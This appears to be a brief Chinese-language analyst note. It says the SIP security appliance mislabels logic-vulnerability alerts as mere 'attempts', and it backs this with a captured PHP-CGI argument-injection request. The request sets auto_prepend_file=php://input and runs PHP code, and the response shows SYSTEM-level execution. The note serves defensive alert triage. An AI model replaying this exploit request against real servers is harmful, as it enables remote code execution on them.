SIP 对于逻辑类漏洞的识别标记错误

SIP 对于 逻辑类漏洞的识别标记还不够强大。 对于返回的数据包，会误判为 “尝试”状态
安服人员在分析的时候，除了成功的数据包，还需要对“尝试”状态的安全告警进行审核
数据包分析：
请求头
POST /php-cgi/php-cgi.exe?璬 cgi.force_redirect=0 璬 disable_functions="" 璬 allow_url_include=1 璬 auto_prepend_file=php://input HTTP/1.1
Host: XXXXXX
User-Agent: Mozilla/5.0 (l9scan/2.0.9353e2234313e24343e2031323;)

请求体
<?php $env["USERNAME"] = @get_current_user(); $env["HOSTNAME"] = @gethostname(); $env['USERNAME_SIGN'] = @md5($env["USERNAME"]); echo @json_encode($env); @die(); ?>

响应头
HTTP/1.1 200 OK


响应体
{"USERNAME":"SYSTEM","HOSTNAME":"WIN-RTVDG32EB1K","USERNAME_SIGN":"fa177138f94a7ea01f549b1aa7893d03"}